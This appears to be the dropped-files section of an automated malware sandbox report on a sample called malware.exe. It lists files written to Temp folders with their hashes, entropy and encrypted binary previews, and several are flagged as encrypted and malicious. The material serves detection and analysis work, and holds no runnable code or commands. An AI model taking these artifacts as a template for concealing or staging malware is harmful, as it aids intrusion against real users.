                        C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):226462
                        Entropy (8bit):7.996424579856407
                        Encrypted:true
                        SSDEEP:6144:S5ffEwuLkpB2OihFJCFUU2aZgjhJywB9Hreby0jSZgrf:S5fg5TCFTejKwBtey0egrf
                        MD5:FFACDA7B991D895CA4CF4F4EEC95352D
                        SHA1:11DF3397FE8BA39411495C8D7C7F4A319263DB0A
                        SHA-256:4A85D0DA488B3FC56E1D91B06AFDF06C53998B2AA284140F73431A112A26998E
                        SHA-512:527B6056924C52D1BE5FAA4B08DF0275C9FD978FDC8940D5E3070EA32BAF401C9222BAF6B2AC6C15731ADB11968D18CA8A99F568C7622695FED41026F0FC0D05
                        Malicious:true
                        Preview:.}[..7...6)......v4$._pU.*..Tu...3W....lp.~.!..(.].."..G..e,...%.ac~..M.@^e...8;3.....\..g..E.dA....M.o...2...Hg^..9.TfS....V.!......'.v......;j...".FAD.6Zk.xO_..~.U..ej0..............A..g;L.....pr._...y....%},.....r##....u....8pl....X.3..B,...w;F.G!M.kUY.+.........e+{R..}.Z._c91..w...!t+.z......C.f..+...s.;...JpO.F...;Z.5.aD/.8ao.....p..v.. .FN,..t...Ei..........%.'k6...F.`..T.IqWW..-..wD+Qo.CW..$..1.u&.2T..k.h.7u..>....M.M.....F.^z......Zj..?..H$.H....:$.I..6`M..5....+b..).....'.0..rW.\..P^.&S....(j.8.&q.7h..N.7[..@St.....n.m".4.p.a.Rou1...i.D...6..!.6l..|.......4....s..7.bv..X...}.eWH..........f...'....~$..p.......4..=v....2.*Dg.....mXK..pG.......w..D.L..-Q... fU.(`w...m........`..Br..mk..+.c.`......|.... .@wU..A.}&....g.}...../....:..t....B.x>H...pq.... #.h...n..;D..O.....e.."5........tpF.Q..=fr.....,.0..K;.\T.??..".!..W)I .a.K..............u..&..Z$.d..ru.~..V_..]!.."...x....|..$$,.j..@.j.......G......V.C....?....dJ.fJ..p....e...4...:.Y{..P..w.E.

                        C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):193190
                        Entropy (8bit):7.997046423957657
                        Encrypted:true
                        SSDEEP:3072:QNkbm+B95nHsSyx0czAKzm1xaa7P2chCeIb1Wncz/lhwCE8GM7QTOLcWAoZIW/u1:BLryxzzxa1xaKPX5Ihs8GB8cWRI9
                        MD5:AA982FDBDC1919B11C6FA17772D61927
                        SHA1:8145C9ADA577FF466B0340F62B1151E25556DAFB
                        SHA-256:E7338E1839BCDF0959B8A3673BA47EF9E164CA9FFB5E8681132ADC04B892F802
                        SHA-512:33CDED74B71FFBD56BA3C6CC7D0CF7E9614508AC95FD438CC85FC49C6BBF36822E9B7017024D654AC0649C0CE9E83D1F29634AD8597F11748E057CABE3D7675A
                        Malicious:true
                        Preview:W.....~jq..VQc...p..;..f..CyzhpV4......;...&.X.Z..Z...s.Y.q.D..e.6..*/..\K^...T..nn8A.h.x....~]w....mf.......v.+Z(..0..........).oX......L.z._/.*..!....`....7j..O....*h..{`.....P..S.2.O....A,..yd...ab%..N9U.eic....'...j........Q..>..!.W"..p{Y...SN.<DI.....#......6.Mj..$.md.&.J....2..oP.:kS..'.R.i.W..._.E.S...Z.-.$.......9.6"...:......x.N"w.....,FH/............ABhZ.&....\&.F8.<Rm..ZRbQ...3Uf....{.yTo<.....(.vQ..)...\.1D.....){Ys.....rv...4a..T@.00j.U-...m...=.k.._...e...I...._..5...EQ..m.n....2....`L.K[..;x=..-.d'. K<..\u.....!.|UaRH..0i.B.G.ofmv.C.=!*..g.d......J.0.)$.O.d......yO..v....).C.r.&..-.._.^s..>1.N[.@....\......|7Y..Be.V.8...A.4Y.......P..y.y"@.....:..-.+..D..pj:..;.c`7?.#.KqL.~..1.pO.zJ.<..qK.eq.N...d..M..)x %.`.P.h....]..Cha...9..z...d..?_hv..o.FQ..k..O5.5....W.Fr.d..J..^2...B\..,uw..BOf\.....B.q..=....c...z_.Rr.~..fJ.d_n.....YK..p_.....`....h....HD...5@T....7.'K..i...,..O.,o.hC.U..bx...Z.....X......m.V..0.e...D.9G.1.V.....d.......A.{.B.

                        C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:DOS executable (COM)
                        Category:dropped
                        Size (bytes):171565
                        Entropy (8bit):7.9937218805867065
                        Encrypted:true
                        SSDEEP:3072:Ad1rH8y0HDgNpuz09z1KiuJpkB//QHJ+c6mMPPY/nLcPX4:AdNHej5Q94tpa/iL6mkQ/LOX4
                        MD5:4919E5F5418FC9C4FAFFF98D4F31C599
                        SHA1:EA8AC1520289C809E8E46A9C30B064F480F8631E
                        SHA-256:C17E1F30ADB5EBA14F53BAA44F9C9EE5D3C8B48531419A9CE1052056A589272F
                        SHA-512:156B8E54907341ACE2631EE092DF6F9AED85229208A7D4C356D02D209BF4F9607E1150CC5965789ABEA286A11D5641BFBF9C17EABD2FDE5363512CFAC1E9B7DF
                        Malicious:true
                        Preview:.Jtci.f......{8.p....Q`.\...k...N..p..k.z....}.."A.......^..fu(M..!..~.h3.#.....)...d@d..../.V......47x...'Q...q......L..D.[.V.Wf..........^.Y.w.d.d.)....A...F..A4./..`......@...}.9..*...e..D.....,..=.Yw...x.....;.W...l.K..O.>........|..[.......vp......2z..........p....|\...-. ...@'U.....D..R..p.C.N..e.w@2..If......k6........^....j....&.......!.+..N.-...e.I-...1Kdi.;....o9..m3....B.B...5...p.un.q.9....(.O...LyP..l.z..{^..e.....&Ynd...?...z..f.2.XI....}.hW.6*l_>Od].C6.M{(x8.A..b.|]]Y...r...,....z.Rv....M.}1.@3#..:.......{.Gr..Hz..........-.Vz..._..(.#}..\i..,.~.....H.,. .Bo.g......z?..";.`w.k..T$p~.M4.e .x uf23.5`..~%rsW.S.?..l..;.e.n....]z....{%O.{'.{k...P..Z...8.`.{.<..w..X.......uh.w.O..w'D..|..t(-..j.U.L...@....No..I..................U.H.bT...G.6M...Z...../W.;a.8E..O.U..\..l/..............B.....i:.v3...5s.1q..*...*#r...c.%..h.p.22..x..>$.K...O!......Z?......|..x._...pv..1.B...H..f,4B...@..7t.b......X....^cd[l.;\...7....Q.2..nPE..'.(&$u2.

                        C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):149925
                        Entropy (8bit):7.995374803433987
                        Encrypted:true
                        SSDEEP:3072:ZhixwO4eAtvbOsSZnJaMOJp97AcVNem5zeU9WEWx+9Pc7:OWLTQhJyacTem5zekY9
                        MD5:1F5063710C7139BFB1E5D5A1BA05DEB3
                        SHA1:40E39B11B804EE9FD789018F53B91B3F0DE9642E
                        SHA-256:779B4699EFDEB7266CDD02A8CCED6BFCF7E774914DE927AC729B54384A5B9F1E
                        SHA-512:05A3D5DE2FB4ED2F8F7C1443C8208D9A178C89F86891D9D6FACC0B1FAEA66ADBE61780A6D1A8DFA17987E535370E689DD477AB9A161E79BCB0A87BE084165B9A
                        Malicious:true
                        Preview:r.......C.C.#.^.Z7...g.L<.E..,.*4.c...^... ..o.AL......u.....6.2....^..Y.=O.N8.......2..g.:.^FW.ni.....'.i.r.5..B.....3....h...........yKM).*.[.!.C.. .&4n5..Oi...\..0..Rr......3....#;...u&K....@b.....$...."...K.).S..?......R..P.......b.w,....E.0.....-........WF.9..vy........D8..Y..K'....7.Le...^.....,.lW...\..>.....#....<J.....z.....sy..;.7.Y..C;...n.f.V.1=O.`.O.<..a!.Y.1.+.'...5...565*..6.CDc.=R.]..P.......L1.m.{....~...,.C......$..=..`.b.J.(..#..w.PS.].E0......D..>..s..C....l(.Mg.@....?1j[...W'lrCv.v.p.... ........_C#H...K.J.I..t]../2Z...:.B<"..t.....T...hGm.:.%L.......N&Cs.0u.....@....F.<.Fb....<........M..2k,.zMN+.1..'..`=..;!..|....I.Y.^/...I...>.wE..6XT.......>O.,.=b."G.a..w..>.........n.........<...l~..4./...... .iX1.....|N...(....(..l.<B}..s'=j2.......\.......(P...!.B.If..p~^.;.......%...pf_.......G..M.@.......#....(.L.S\.......yi:E..Z.8/}z...P.j...w..........A...c.#P..c.l.n..u..q0.._.=.-...t......l......{.g....~..F(.Y.....;.2......IY.

                        C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8547436
                        Entropy (8bit):6.609151436633964
                        Encrypted:false
                        SSDEEP:98304:kL/NYGhoRjUJnH9y3xhVAvqFPZArlyqo9HM:kL/N+Rj2Hc3b52rkqo9HM
                        MD5:9A50D4EE4A49902D77A40DFB6818F38A
                        SHA1:33778B1E8D9781548E9B6432F23CD068F9C26E42
                        SHA-256:7C78822465C6014D333856FF0F509185C4DF2FB8394796EF73D7DAD48FC0AE6D
                        SHA-512:DB9AA4C82AF3B691B0DD0A2CE8F678AF380D65CA4044441864A519DC03B9EA21EBE010FD2532B7FB10AC22B98F2F4F036A057B36DD6403B2C4CB4A19C4133C94
                        Malicious:false
                        Preview:H".;...2=*iX..7.....Vw...y..U.g..T.dS..]T.T-........._....AaH*...-O^$.o....*.AE.'....cGV..?:..M'..Sx..;....i\.r.b...../R.......z.N.vv...T.z.:..w.35.4.o...F.:.:..5.f..sL... ..u2Z,.uKH....l.@-.....Ra.hfAE`k.z$.x.J..,LL.. .e.)){.c+....+.U..w.RW...H.wb......f.....^..m.os...:$.*.q.8."....YmJ2.)0..q...P..WD.......2]6j.....[G..=iq.Cd>.....Z....%..(%O.K.T...`!?.j.Ep..@..$..fJ6.....7fu?.V...u.r.c.t. ...L..p_..IqdW./U...W..c..G..=.t._..J...4dd.?.c/...CTq..~.Y\...L@<~i..J.....7....=.........TpF..,y{..O..^..Q.Qg8.(...9`....Nw...yL..4..yRN.^..+A...I.....+.j3.i...e.HU.q.J....r@...w.].b.)..{...F.y....w.^. ...D.^....YS2.24.E.h-.....+.w..)........\.......8./Y.y..Hpn.L...k......KQps..(.qB\.Y)q=.N.nmj...\(F=p....5:P......o...I....p..r.7=.F.C........K........r.....c.qT..8........'54...UfU.D.L....9n.%._....{..Y..,{.S...L=,.....@n....^a[.."5^*s.S..D.....P....G.?..........+W.gcR!....7..*w..b$..H.........wW.A.b...FB...W.X......y...6..q......i\.8.n.!_j.0P6{S1...I;..v

                        C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8547436
                        Entropy (8bit):6.608295078735462
                        Encrypted:false
                        SSDEEP:49152:5CU1IXKcI34n5NGdAY5df2dSLgrVXcKCpKD0T4B4kZYdfbpCPvXurhY/TEluauJO:WzDGVIB3Cc4C2pCAluzJ9ghh
                        MD5:493FABC5CFFB07C598592737BF32C6D1
                        SHA1:E9EEFF2E726775908A7CD2090569CCD9C2CB2D44
                        SHA-256:CD389C2CCC98660EF8A4F43759237C4519251E8921CCA33510218FB8A08E40B3
                        SHA-512:BD5F4AD890787D7135D4A899CE2A057C259E3ECC340A4A9692D7A102BF02549C1E48F16F9B0A9058066A93121411EE3A3F6CD13133B11290B9DD646A82CDDAA9
                        Malicious:false
                        Preview:r../.'..U~.AY@...QY.5..lm.I..P?...nL..?['.....`z..!:... F.:P..z.O9Gj.......S.......,....`-.....>....&.9[Y;C...f0.B..@1...}..i....qu.|.q.zy1l&%Q.6...$..N.Xg6Nzy..V. .f".9.....M..z|0.)..0}...T...u....]/a....WN..G..s..&...)oC@...n*..S..X..3....4.=.......BPArD.....|'...`nN.....q.|..wz.3]..t7k.X.m...i.:.#...jR.......=4................54....5~0..=.,.W)..nFj'..L.....'..h1.V.E..1.D..,.-....h....X\.0p.a1...p..I..,N.Wd....E..h..[ZM;....6/-.....!.R.np.....d........r...=1.s..H.n...__.iF_...#.u.Xs...fK.:..+.#*...{....cG5......[.'a.=.N...:.....U..CI......].O....l.".M.3...6....41.....i...........:w..E<h.N..Zh(....o.Y'q{...(.. `E..T....#...m.Y.j...J.[..E..Yz..H$".w..x.....1f..D.^....__....vE>j=..XgFr....`5.Gy.dc.:e....R..?.....Y.......I|rA.#..;R.#....]...%$.2....=....IH..;.m..f......D...A8........}..K<...g..pb.._J...5s.U...A..4..95%.../...i...d.,<...'...@}X.......Q.....l.NpnL!.|.`.jHp..<.&b.|.L. 6.=......o@.q....An.I0.c.Q<.:<X.s.....N\...i....,?k8..O....

                        C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1192044
                        Entropy (8bit):6.25842014756064
                        Encrypted:false
                        SSDEEP:12288:ARMQ4pxReNMzN6XA9tFxJL47FrKC13P/lplTPcaQMpO:AKpxOYcetR4Z5TUZMpO
                        MD5:24DD7BF29EC542775336E54C7E2300AB
                        SHA1:308E4B576631D8F65DAE19CDF857B972FF6B2D23
                        SHA-256:85546F8B6F645B40EB7F097B7274103A0625563A1B806385E4AACDFCDC52EDC7
                        SHA-512:A399F22273DBE9CDE4B537040A848A97067D67255A8CD24516DE92A25EA0C8840AF74C6C5A8E8151797C0E26AA2792CEF9A9B9DFDA0E3D3AC0D8B99847FED601
                        Malicious:false
                        Preview:.{B.e.8w....P.|...5M=.....NC6...?U.o....N.B..+...,.P.Q.7.....:p,.p..MOV|C.........a.y..x.6..K@...&a./.. ..Dv...I9.U.O.E.9.c|..$....2.g......B..9...!K...U.h.....y(.-.]._dlO...}0..g.t...'Q.....'.Q..A.o....{..HX....8....1v..Q....5...S$.\_.-R....5.N..../......J.?...?...t..PeS.6..cH..M.3$......A..o.......M..~!...@..J..7....D.."...@..#sO.2......t....h...Z._,Q....Gq.....\!....?e\`|..8.i\.Y.H0....j`/.B......t.;....&.AJ.=.z...".!...3...]...4...Py....h1..h..~.n..y..#."@r.KX..=Yk..(.......7...<...c...V=..d][.R_./..d..O.....Jia..l....i.An.....l...Q.E..d,.J..I2T..?!v....N...&..|..[-.9..#.6.n.^.@?.....v.o`.dT;.=C.[t....j...~......./.....A....=.af...T.a.x*.`..#.....k.y.tt...7,....,.+....1.....Hn.a....4W.io.A...`....biA+G.j..D..)...u.P>AyS.N.oF.R..<.I..{..........++.........7..c...C..*.e]+!....6@......I.N..{.Bc.....C..N.B.=o.r.f.:..m!..-..<..G..t...........A.1....|.Z..L.?..2-...'...E....q%....IQ+..3..U. {y.G.....Qx3.Y\.......sb....^.M..Uh.....^Cbe...;.,'

                        C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1192044
                        Entropy (8bit):6.25692708796458
                        Encrypted:false
                        SSDEEP:12288:riBPAQ4C3OC/76WMzEjOxJf2Iw8bViTuxJY6oADZw23IXPxgqjVG635:riBPsC3OWY7zfrw8bVYIoAq23mgEsy5
                        MD5:CE06AE85EBF54551B758C8B2664E2108
                        SHA1:D52CD564C91C5152B4AA46D46F31DFE3D3C73AF8
                        SHA-256:E1F12A6D44B1F440D3D41822DDC323C06AFDC40FED4A22E5659D7EBFA742C47A
                        SHA-512:C18FA213A1C30C9EA045631EB757D037B95AC2B78D1525D21E5DFB368112124ACC27A0F7EC17FBCF711E50E33DCBDCB06D09F99AA733E23B97596AD1619F2BF7
                        Malicious:false
                        Preview:z@...........#(u..d.^.C.^..S...SxJ.o..g^.........-..5.][E.D.FV........Iffs.;U.......^....{.Z.{W.E.......d......T....e..9.H+.7$....^/..n{.n..l.>.....3.E..........5.\....-.>......q.4....0 ..Q.H...UE......... ..Jd."./..;Q.Xn...t.B...H..E.S<....kk.B...~.\>.y...n.'.5y.\._A.(.l]...\Vf...>W...i.......&....6.+U .....N.%... ..Nu.>...7......nB.....%..k9.c_.K.)v6..fY.......sL'KP..6#.V...s..P...e....l..~.r.W..So.O.S7.....fL;M......m.H..d...s.HQ.......W...N.L."@e....p.C....DP'.HN.@c.z...%.m.b.5t\..\.L.,.L,....;..9.n\j.....b..\.pH9.3...|>.92.H..[n.B7.;s....i.}u...'qU.......h._..;..o.^EC .I...f3....tR...Sw...*.....-...c.F/...G..Q.......s.o........\sJ...%.k..8...ER.....8~.Et.Y`....J...9..~...W...n.a..l.s.K.=.#.nZ..eC.....9..m....N.....(.<.A.7.?..3coQ5.G.[..."4....OF.&UX...&j....mi/s....4..I/.g..._._...NDF.6[>....%."..\K=C....!2.5...|./......6.8.t'.2|.._.P.....lm..N.T.=.q44...QKr..tK....wgf....[..:s0...H..-.......|h....[M..?.(B.E.=...W._....x0..=...,.R..4

                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16614
                        Entropy (8bit):7.98887746539171
                        Encrypted:false
                        SSDEEP:384:sHl392M5kERYDarAv1jeBHLWYQwPur+28ExrPt:w3dJRKiHLWKo+at
                        MD5:85A0F7E02026AA1F5725D2E78FE76015
                        SHA1:5AA14C472A2FE960C313F0AEC77E370FD3EC3B87
                        SHA-256:6C1F8518AFA037A700A7319EDF8FE45F2E4CCB2FD2D6CA64E66D473263BF0CF4
                        SHA-512:C7849B729F1F4D474B48EFCB589EC76F725C7D93BF50C75BC974F3853E6EB34F851202504E6C99FDBAD649E96891815AAA926954883C3092C0F7657EE750A43F
                        Malicious:false
                        Preview:...{UdA....T.\...w$.X.}.R..2......m.AQ...i.../...\.4...c.QL.pj.......H'.{.7...*Y_%.>.....{p....A..7..x.%.q.........u..h/3.z.....F.G....S...:.....H......<.....cW....n}.8.5..}(.!.8..Y...r.78..\K.;.../l..*.!q...H.Y...O^g....u.y.....l....!...d...o...V...sDC..D...H...,..........A..4...o..c....../.N.hjg.1..I.:...43...`Y[S..p..|..2:...C,.<}B......)..a;t..+..j.mkW.e9....^...j...xP.l05....pI....H.o. .&1.<Z........-V.WM.....@..].m....5.........H......)...r!.,.x-...n..{.J..v..*.h...zZn.Z.1.R.#...@0.VF...t..H.T.c....Md...p6q..c.GZ...w.....C8g.#.....ct. u....8..TL<..y...6.I.~.. ~..U..F..N*..V.....0...S.@.Jg.....T......DEyl.....}X..al.r....oS...._5....<...N".!)....@c...~z.,.. .....bT..^..J.....7....zh.~.0,3tx.u~Bb..=...0.8.....C...........z.t....~.\O..n..G.\...j.T......6Nbg.D....Ahh...b17..D...R..m........!..<...s.{."2^.1.L.mb>.8.'&...2.`;.,<F.u.[.....n.e.<.4...cJ...{=...e..j..0..%...k....A...9~.N3...bz.l".t...c.%...Y~:..V...b.i.d..&..

                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16605
                        Entropy (8bit):7.989769179018401
                        Encrypted:false
                        SSDEEP:384:bOq2CmgmYT0o64H6aKvi57KyK7Z0kLQpytiFOS7hw7jk7vJ:bHwgmYwGHdw4KV0kLafOwMyJ
                        MD5:4949AD484F38633AD7330366A16930D5
                        SHA1:F5FCE71BD0AF734FB5BB562793CEFB710D6CA7CA
                        SHA-256:FD015A0FECF97B673237D35AA3F62A12AA9B6BDFB7514CFE98E777202992F368
                        SHA-512:9CA640C3AF369A9B21220ADDEC604688086C5F6E28B8D2B8504DA1C106742D3B3E5F56A5F15046266AE7CD25D9B683CD563982FCB90FCCEB2D064C8E9993CC77
                        Malicious:false
                        Preview:6^8..gx.......%6g."ND...1I..-..L.N....d|8.+......&....67....q.r.v=..[.,..!..n3.ZM.\l.V.BM..L.^....O].v..#:..J.-.s...-.....K..I.).Q_$..z4/.0..0............u..8.....}..9.^......U.a...[.'E......qJ......I... .l..[kG..HF8.u..'.W2\.F.H.2...@.9..;....Y.....(P.Isg......K..m..(....X...aX.....&...G%.z[a\.:z..B.n..z/C.K.......e.`r"S|"..)..%%.FMaW...;=.,.N...c...)QG.LVK......jXVp;....*R3~U..%..+..n.t.....hu{[eL7..T(...*.O=...c.....A....F.T.9..n..bY.C..O.Z....wq.=.k..'.k.7U+x.!q..,.T...$.-..i...eY'..U.-8....BRE.[N.....xm(K.(...=.o.[m*.5A.P..D".7.n+....4.}...<.G........=..G..X...P`.n.j.........(.~.Yk..5u...8.s.K.[.4..!.....AN.9;...0.W.Q.>u?..oM&.Z..LV.o...x.;.;..@.O.[8...2...^`......oQ.<..Q<.......5u..P..~.E.t3...>.....8.>0..bV0.......R.{l..OR..........E...)R..E..Q...`I......Q.{l..~v.\.b?q`..='0.Vs......."..x..q..F.e..y..I.....u...{...:..y.n)...DJ.NnLP..TZ..e..@...H..I..:b}.b.....*./.rb.....+.!...I.\.N).....@/pz..b.....7.r.,....<.nBD.!.R....0.J..

                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16707
                        Entropy (8bit):7.989522061179282
                        Encrypted:false
                        SSDEEP:384:GDkCf6pMkF9N8J4eJINw8qEwzjehMQOKWT8tnBvjPS:84nbyJ40IDqXj8M8kMW
                        MD5:E668177F6577CDEC9DE50264E8D29914
                        SHA1:A61EA867A837D511A2124F7999F69FAFE2E49D0B
                        SHA-256:D72D836D44A2469C35F409E781E8EA17DD3F086ED58FF766217B04F9D3D3CD97
                        SHA-512:903B143C6EDC65BAB3153C393AACE8199529D089CF02B59BC2FF8569A84EFB2037E8F81092EB351F46A30229179E4C6F38D62BCB095397313481FF643D198317
                        Malicious:false
                        Preview:....'.in.=D..V...^.......U..-=..... K[.].^Z....G.C.U...&..p...-.7_...?.L......R.{......l...Q&K..m........&....I.....RK....KC7e..S.kq.M..K@...D......Q.(.....}-.k$....|.#q..y.E..(?{.E.DF..W.o.\......de..deq.... r..j..B+....[.J}.)..I#.h..Gy(.nn.....H.jC...05!..7.j.&=....v...v........nn..s<D8n.qXx.y).c..y{..~.r._d"..S.......].c.....r...0............6.E&.R.A...3M..J..l[..z.lT...I@1V5.....4.....'.j...dd~..(`.._.x..,3c......#..LD.)rY..#..&.u..9\\\....'e3 dA.B.7.|.O...~g-_&x.Jr....c.C...[.95..$...*. ..A...a....p.........v'8..L..;3F......US$F...4..C.....P.$....x..=-,..)...2n.t....Z..T..3.T.9.."...Q^6.,.T.r$......A...U#.c.oY..,YP....l.~O=..z<.RxRtV....l+i.L..u..;R.Br..\..`.p.Fg..Dr.kL0.3......C...........9...)........}j.P..b....s.....C....f.....`..@....*.b[g-..;...WB..=...h.K.....:5..\..c8..l..i...=.qI8...|.?.bp,.].2.....*...=X.......m...a...wJ.Kr./.-{~.q..~q.../1C...l..........D..:......Z....@PTh,.]..Z.+U..B...)......:/..5`~..Pt.......W.y..u ......#M.

                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):23984
                        Entropy (8bit):7.990707764203653
                        Encrypted:true
                        SSDEEP:384:DULFjWtIENDIV3TSWKY+zMJGiKKU48B1SUn2V1j70jCGobkX9PCXwLTJ33E7l5A:AgtIEqhTtKYUMtKD4A1SUn2j4eYUuClC
                        MD5:C5B831521636AAB7EEF5765D1B2F56A0
                        SHA1:0217ED1B6C130FF82924D7711429AAE2510A54CF
                        SHA-256:A3F326E544F979307C3BD15055AC7344EE4379583B7646F8E43E1DAA7A66FAC9
                        SHA-512:FD50A931815E744F0BC8120108C33A36F001F01BFD458661AB3CC4A8F60F622BAF526F7B3082F2121EC684E167E3C69044C82C63B29539BACD5AD2D87BDFA045
                        Malicious:true
                        Preview:...cA"...v.}..oZq..W...M.QQ....u../_.M.......x..l\....fCF'..x...n...=D...I~_.^....7..S9t..j<b[=gb.....|lSr*%d"..u.:..S...R.:,.(.7...+.?5..f.}.Q|_........J|.d...Z.?..7.....Z.......,.XL.?.7ki6.....y...|..]@.b.....(r.ST..e...$D=&.l...m}. ...*..=v....i\.c.h...*.V*........N..J..&C.7...WP.Up`.k).^...q]..._.......=..?9...*.._.H.ZW.d..n..V...<..go...(YPpB+x.C....j=..(F!zJ]W..............D...v..v.}dg...%...O.$......IL..U.N.u.#....q7Gu.e.$.,..k'..tg#....e.@..@...T[.*v...)......<....-..)If....#...$...^;}6p.N9-.'$..j.x...?...K....mk.-........c.}.!>?n$...v..D..D........(.....{J.lM'..y.J.%k.....3....mX}FDV..+.)k...KV.Q...!6....p....|CiE............x.~p...J...W.....w..f..9...[..Y..o..\..>!W..l.jv..Vb-...o[(..>.....-.^.M.Q.\.C..KzY!....%.8..>.....n...3..2.^okM,z..L".V.ye..*S..e...j.v..).@......9~....)/.y..%..t....E.M.S\..zv9.R.l........`.c.....s..v.X."c......'...9n.....o..,O.~Qi...#<..P...o.._~........B.g..`?K..~...7t..0..@l..H.tgJ.0!.....9...

                        C:\Users\user\AppData\Local\Temp\hardz.bmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):602276
                        Entropy (8bit):7.9581692359131955
                        Encrypted:false
                        SSDEEP:3072:jlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmlmg:b
                        MD5:AFCB41B1EB2E591606ABA6187868EB9E
                        SHA1:CC6C7C359D28D5B93FEF5E486FB83B30675AA512
                        SHA-256:74935DF599247D9FE066B3FC8F95D5C24F9AD21E5E9C39F3E676ECD4AA4DEF8B
                        SHA-512:3B71C7EBE80CDC45E9DE350F01F141A9AFBA55E7A09F11EC55D169AD4725BBEBC784EBB0CEB998C5DC029F9B6D02D30C8CB09E5F23B66BCC4296D0C1954C6819
                        Malicious:false
                        Preview:..Q.|.8)c?\?7i.1.v.<.a....Q....u.u>K...4..-i....}8.!`t.\0e@|.}..]..%$. "+...O.)Hc^g.].........8}...g.- .A...~!.z/67\X3AHz*..eJEPx#...o.X.#\..H;.c..P.!.I._....{SapcG../%.\$].......S'...m.M.i}s...&.....W.....9|".g...Y.......A/.)..}:..F.q5.b{j.F.d......8..@(.X.?....!Y....kK..".W.u.,..!n.-K....r.9v.?.M<.U.@./.].DR.8..aX.R._...P).}.t...\L.?...7D\1.,zCV...c3ov...../R[.rgf..l....#.A.H..\_..2.*.Q..d...=;.2...h.d....]......n...s!.|.t...<...+. ..NZ..hf...1.|.........y.6..g.0..yS.v.|?...........;..Z.^..)...^1W* .3C<.;......T.Q.......=..2...lp%O."9e.....9....S......u.......#C;_.. ...q..uM.....`h.......y.5.\..c?T.[.*...r..........z..JOzv.....i^.L.I.....2...K.O...=.q......8......)...^k...;=b.....u..Q...~.GO..k.^)..y.K...oB...$...a...p......b.h|}(...8LCZ..%......'...).>..:..(.F_.-C$..4JB.k.r...v.\5..UsTo.WI..LH.L.ej..9......Q..9?'..^L.^%....7..h.....*....(.hr..Q...".........6..E....~.T.7...1_]|,....V("..S...!n.U8x5.....T...>n.......D...k.2.(..)7..j..8..

                        C:\Users\user\AppData\Local\Temp\user.bmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):602276
                        Entropy (8bit):7.957707408253054
                        Encrypted:false
                        SSDEEP:1536:Brd4uqJQOOUwf7OQOzuAMfKth0AcGEwH9:BiucBOrVsuAIYDcxwd
                        MD5:D9D18FEC996FE0F435D36E60930A765F
                        SHA1:B78684D2B49E0F4A2CA148764A04C4059FC4859F
                        SHA-256:B4C5D9C3202B35E69094517865E1A33C15733A92FB0143BB1CD19C64309B9CC9
                        SHA-512:B55DF25474BCDDC23B27FAF20564C9DCA13C127D6E5F63C6911D8BD01C5C4BE5F70E389E2D3FC93B1DD19E55CC9BD44F840266048E0E6F210A338F4B8C57CDDF
                        Malicious:false
